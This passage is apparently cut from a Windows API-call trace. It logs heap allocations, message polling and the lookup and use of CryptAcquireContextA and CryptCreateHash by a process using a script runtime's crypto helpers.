lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0259.761] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x15) returned 0x2e699e8 [0259.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e699e8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0259.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0259.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0259.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0259.762] GetProcAddress (hModule=0x756e0000, lpProcName="CryptAcquireContextA") returned 0x756ffc40 [0259.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0259.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0259.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0259.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0259.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0259.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0259.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0259.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0259.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0259.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0259.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0259.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0259.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0259.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0259.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0259.763] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0259.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0259.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0259.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0259.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0259.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0259.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0259.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0259.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0259.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0259.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0259.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0259.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0259.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0259.764] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.764] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.764] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0259.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0259.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.764] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.764] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0259.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0259.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0259.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0259.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0259.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0259.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0259.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0259.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0259.765] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0259.765] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0259.765] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.765] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0259.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0259.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0259.765] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.765] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0259.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0259.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0259.765] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0259.765] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.765] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.766] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.766] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0259.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0259.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0259.766] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.766] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.766] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.766] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.766] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.766] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.766] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0259.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0259.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.767] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.767] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0259.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0259.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.767] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0259.767] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0259.767] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.767] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0259.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0259.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.767] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0259.767] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0259.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0259.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0259.767] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0259.767] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.768] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.768] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0259.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0259.768] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0259.768] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0259.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0259.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0259.768] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0259.768] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0259.768] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51d78, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0259.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0259.769] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0259.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0259.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0259.769] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0259.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0259.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0259.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0259.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0259.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0259.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0259.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0259.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0259.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0259.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0259.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0259.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0259.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0259.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0259.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0259.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0259.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0259.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0259.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0259.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0259.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0259.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0259.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0259.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0259.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0259.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0259.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0259.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0259.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0259.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0259.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0259.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e50 [0259.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0259.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0259.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0259.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0259.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0259.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0259.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0259.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dc0 [0259.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51dd8 [0259.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0259.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0259.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0259.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0259.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0259.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0259.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0259.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0259.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0259.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0259.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0259.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0259.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0259.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0259.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0259.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0259.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0259.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0259.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0259.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0259.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0259.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0259.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0259.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0259.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0259.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0259.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0259.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0259.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0259.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0259.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0259.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0259.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0259.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3be0048 [0259.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0259.772] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0259.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0259.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0259.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0259.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0259.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0259.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0259.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0259.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0259.772] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0259.772] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0259.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0259.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 